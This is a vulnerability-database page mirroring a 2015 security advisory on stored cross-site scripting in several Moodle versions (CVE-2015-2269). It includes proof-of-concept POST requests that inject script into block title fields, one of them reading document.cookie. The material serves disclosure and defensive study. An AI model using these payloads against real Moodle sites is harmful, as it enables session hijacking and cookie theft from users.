Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Moodle 2.5.9 / 2.6.8 / 2.7.5 / 2.8.3 Cross Site Scripting

🗓️ 17 Mar 2015 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 57 Views

Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Cross-Site Scripting Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting Vulnerability
20 Mar 201500:00
zdt
Tenable Nessus		Moodle < 2.6 / 2.6.x < 2.6.9 / 2.7.x < 2.7.6 / 2.8.x < 2.8.4 Multiple Vulnerabilities
21 Apr 201500:00
nessus
Tenable Nessus		Fedora 20 : moodle-2.6.10-1.fc20 (2015-4530)
7 Apr 201500:00
nessus
Tenable Nessus		Fedora 22 : moodle-2.8.5-1.fc22 (2015-4613)
22 Apr 201500:00
nessus
Tenable Nessus		Fedora 21 : moodle-2.7.7-1.fc21 (2015-4724)
7 Apr 201500:00
nessus
BDU FSTEC		The vulnerability of the Moodle learning management system allows a hacker to inject arbitrary web or HTML code.
7 Aug 201500:00
bdu_fstec
CNVD		Moodle 'lib/javascript-static.js' Cross-Site Scripting Vulnerability
5 Jun 201500:00
cnvd
CVE		CVE-2015-2269
1 Jun 201519:00
cve
Cvelist		CVE-2015-2269
1 Jun 201519:00
cvelist
Exploit DB		Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting
17 Mar 201500:00
exploitdb
Rows per page
`  
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting  
  
  
Vendor: Moodle Pty Ltd  
Product web page: https://www.moodle.org  
Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9  
  
Summary: Moodle is a learning platform designed to provide  
educators, administrators and learners with a single robust,  
secure and integrated system to create personalised learning  
environments.  
  
Desc: Moodle suffers from persistent XSS vulnerabilities. Input  
passed to the POST parameters 'config_title' and 'title' thru  
index.php, are not properly sanitized allowing the attacker to  
execute HTML or JS code into user's browser session on the affected  
site. Affected components: Blocks, Glossary, RSS and Tags.  
  
Tested on: nginx  
PHP/5.4.22  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5236  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php  
  
Vendor Advisory ID: MSA-15-0013  
Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383  
  
CVE ID: CVE-2015-2269  
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269  
  
  
09.02.2015  
  
--  
  
  
Random Glossary Entry  
---------------------  
  
POST http://WEB/my/index.php HTTP/1.1  
  
  
_qf__block_glossary_random_edit_form=1  
bui_contexts=0  
bui_defaultregion=side-pre  
bui_defaultweight=4  
bui_editid=304  
bui_editingatfrontpage=0  
bui_pagetypepattern=my-index  
bui_parentcontextid=411  
bui_region=side-pre  
bui_subpagepattern=%@NULL@%  
bui_visible=1  
bui_weight=4  
config_addentry=test  
config_invisible=test2  
config_refresh=0  
config_showconcept=1  
config_title=" onmouseover=prompt("XSS1") >  
config_type=0  
config_viewglossary=test3  
mform_isexpanded_id_configheader=1  
mform_isexpanded_id_onthispage=0  
mform_isexpanded_id_whereheader=0  
sesskey=S8TXvxdEKF  
submitbutton=Save changes  
  
  
Remote RSS Feeds  
----------------  
  
POST http://WEB/my/index.php HTTP/1.1  
  
  
_qf__block_rss_client_edit_form=1  
bui_contexts=0  
bui_defaultregion=side-pre  
bui_defaultweight=4  
bui_editid=312  
bui_editingatfrontpage=0  
bui_pagetypepattern=my-index  
bui_parentcontextid=411  
bui_region=side-pre  
bui_subpagepattern=%@NULL@%  
bui_visible=1  
bui_weight=4  
config_block_rss_client_show_channel_image=0  
config_block_rss_client_show_channel_link=0  
config_display_description=0  
config_rssid=_qf__force_multiselect_submission  
config_rssid[]=3  
config_shownumentries=11  
config_title=" onmouseover=prompt("XSS2") >  
mform_isexpanded_id_configheader=1  
mform_isexpanded_id_onthispage=0  
mform_isexpanded_id_whereheader=0  
sesskey=S8TXvxdEKF  
submitbutton=Save changes  
  
  
Tags  
----  
  
POST http://WEB/my/index.php HTTP/1.1  
  
  
_qf__block_tags_edit_form=1  
bui_contexts=0  
bui_defaultregion=side-pre  
bui_defaultweight=4  
bui_editid=313  
bui_editingatfrontpage=0  
bui_pagetypepattern=my-index  
bui_parentcontextid=411  
bui_region=side-pre  
bui_subpagepattern=%@NULL@%  
bui_visible=1  
bui_weight=4  
config_numberoftags=80  
config_tagtype=  
config_title=Tags" onmouseover=prompt("XSS3") >  
mform_isexpanded_id_configheader=1  
mform_isexpanded_id_onthispage=0  
mform_isexpanded_id_whereheader=0  
sesskey=S8TXvxdEKF  
submitbutton=Save changes  
  
  
Older not supported versions  
----------------------------  
  
POST http://WEB/blog/index.php HTTP/1.1  
  
blockaction=config  
filterselect=1343  
filtertype=user  
instanceid=4992  
numberoftags=20  
sesskey=0QCG5LQz0Q  
sort=name  
timewithin=90  
title=ZSL"><script>alert(document.cookie);</script>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Mar 2015 00:00Current
EPSS0.00534
moodlecross-site scriptingpersistent xsspost parametersvulnerabilitynginxphp/5.4.22gjoko krsticadvisorycve-2015-2269xss1xss2xss3
57